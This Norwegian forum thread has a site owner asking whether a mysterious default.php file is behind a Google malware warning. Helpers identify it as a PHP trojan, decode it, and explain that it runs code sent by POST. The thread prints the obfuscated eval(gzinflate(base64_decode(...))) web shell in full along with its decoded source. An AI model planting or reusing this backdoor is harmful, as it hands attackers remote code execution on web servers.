Skadelig programvare

[Dag Frogner]

Fikk en mail fra Google om at en av mine nettsider inneholdt skadelig programvare og at de har satt opp en advarsel når man går inn på siden.

Det eneste jeg finner av mystiske ting (dette er en statisk html-side, så det er ikke veldig mange filer å lete igjennom) er denne filen som heter default.php:

<?php eval(gzinflate(base64_decode("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"))); ?>

Stor sjangs for at det er denne som roter det til?

 

[adeneo]

Det der er en PHP trojan'er, så ja, det er nok stor sjanse for at den ikke slipper gjennom hos Google?

 

[Dag Frogner]

Takk for svar mister.

Har fjernet filen, men har ikke vært borti dette før, så var litt usikker på hvordan slike filer ser ut.

 

[Pong]

Kan du forsøke finne ut hvordan den havnet der?

 

[Dag Frogner]

Det må jeg jo prøve på, men jeg aaaner ikke hvor jeg begynner å lete. Får prøve å lese meg litt opp på temaet.

 

[Tonny Kluften]

Finner du ikke ut av hvordan den havnet der så kommer den nok igjen.

eval gzinflate base64_decode Online Decode Tool sier:

@error_reporting(0); @ini_set("display_errors",0); @ini_set("log_errors",0); @ini_set("error_log",0); if (isset($_GET['r'])) { print $_GET['r']; } elseif (isset($_POST['e'])) { eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e'])))))); } elseif (isset($_SERVER['HTTP_CONTENT_ENCODING']) && $_SERVER['HTTP_CONTENT_ENCODING'] == 'binary') { $data = file_get_contents('php://input'); if (strlen($data) > 0) print 'STATUS-IMPORT-OK'; if (strlen($data) > 12) { $fp=@fopen('tmpfile','a'); @flock($fp, LOCK_EX); @fputs($fp, $_SERVER['REMOTE_ADDR']."\t".base64_encode($data)."\r\n"); @flock($fp, LOCK_UN); @fclose($fp); } } exit;

 

[Dag Frogner]

Som på norsk betyr?

 

[Pong]

default.php prøver å kjøre koden du sender til den med HTTP POST.
Og det kan være alt mulig rart.